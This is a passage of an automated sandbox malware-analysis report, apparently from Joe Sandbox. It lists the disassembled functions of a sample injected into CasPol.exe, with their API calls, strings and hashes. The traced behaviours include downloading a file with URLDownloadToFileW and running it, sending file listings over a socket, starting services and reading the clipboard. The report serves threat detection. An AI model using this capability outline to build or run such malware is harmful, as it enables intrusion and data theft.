                              • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                            • FindClose.KERNEL32(00000000), ref: 004095B9
                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                            • String ID:
                            • API String ID: 1824512719-0
                            • Opcode ID: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                            • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                            • Opcode Fuzzy Hash: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                            • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                            Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ManagerStart
                            • String ID:
                            • API String ID: 276877138-0
                            • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                            • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                            • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                            • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                            Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                            • _wcschr.LIBVCRUNTIME ref: 00451E4A
                            • _wcschr.LIBVCRUNTIME ref: 00451E58
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                            • String ID: sJD
                            • API String ID: 4212172061-3536923933
                            • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                            • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                            • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                            • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                            Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                            Download Yara Rule
                            APIs
                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                            • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                            • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                            • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Resource$FindLoadLockSizeof
                            • String ID: SETTINGS
                            • API String ID: 3473537107-594951305
                            • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                            • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                            • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                            • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                            Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0040966A
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstH_prologNext
                            • String ID:
                            • API String ID: 1157919129-0
                            • Opcode ID: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                            • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                            • Opcode Fuzzy Hash: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                            • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                            Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00408811
                            • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                            • String ID:
                            • API String ID: 1771804793-0
                            • Opcode ID: 24d131f499e64054f79a0f46ecbae19e6fc47dfee84614c45b7e196f831b81b6
                            • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                            • Opcode Fuzzy Hash: 24d131f499e64054f79a0f46ecbae19e6fc47dfee84614c45b7e196f831b81b6
                            • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                            Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                            Download Yara Rule
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: DownloadExecuteFileShell
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                            • API String ID: 2825088817-4197237851
                            • Opcode ID: 69075e968859f1327e759487f5d3b6cbdb930596ea59a23a81903788949ec952
                            • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                            • Opcode Fuzzy Hash: 69075e968859f1327e759487f5d3b6cbdb930596ea59a23a81903788949ec952
                            • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                            Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$FirstNextsend
                            • String ID: XPG$XPG
                            • API String ID: 4113138495-1962359302
                            • Opcode ID: 8ee3c4b34050bfc3eb39b734b42787355f0f4c7cc0427839037de91a24499d9f
                            • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                            • Opcode Fuzzy Hash: 8ee3c4b34050bfc3eb39b734b42787355f0f4c7cc0427839037de91a24499d9f
                            • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                            Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                              • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                              • Part of subcall function 0041376F: RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                              • Part of subcall function 0041376F: RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateInfoParametersSystemValue
                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                            • API String ID: 4127273184-3576401099
                            • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                            • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                            • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                            • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                            Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorInfoLastLocale$_free$_abort
                            • String ID:
                            • API String ID: 2829624132-0
                            • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                            • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                            • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                            • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                            Function 004432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                            • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                            • ExitProcess.KERNEL32 ref: 004432EF
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                            • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                            • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                            • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                            Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                            Download Yara Rule
                            APIs
                            • OpenClipboard.USER32(00000000), ref: 0040B711
                            • GetClipboardData.USER32(0000000D), ref: 0040B71D
                            • CloseClipboard.USER32 ref: 0040B725
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$CloseDataOpen
                            • String ID:
                            • API String ID: 2058664381-0
                            • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                            • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                            • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                            • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                            Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .
                            • API String ID: 0-248832578
                            • Opcode ID: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                            • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                            • Opcode Fuzzy Hash: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                            • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                            Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID: lJD
                            • API String ID: 1084509184-3316369744
                            • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                            • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                            • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                            • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                            Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID: lJD
                            • API String ID: 1084509184-3316369744
                            • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                            • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                            • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                            • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                            Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: GetLocaleInfoEx
                            • API String ID: 2299586839-2904428671
                            • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                            • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                            • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                            • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                            Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$FreeProcess
                            • String ID:
                            • API String ID: 3859560861-0
                            • Opcode ID: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                            • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                            • Opcode Fuzzy Hash: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                            • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                            Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$InfoLocale_abort
                            • String ID:
                            • API String ID: 1663032902-0
                            • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                            • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                            • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                            • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                            Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$InfoLocale_abort_free
                            • String ID:
                            • API String ID: 2692324296-0
                            • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                            • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                            • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                            • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                            Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                            • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalEnterEnumLocalesSectionSystem
                            • String ID:
                            • API String ID: 1272433827-0
                            • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                            • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                            • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                            • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                            Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                            • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                            • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
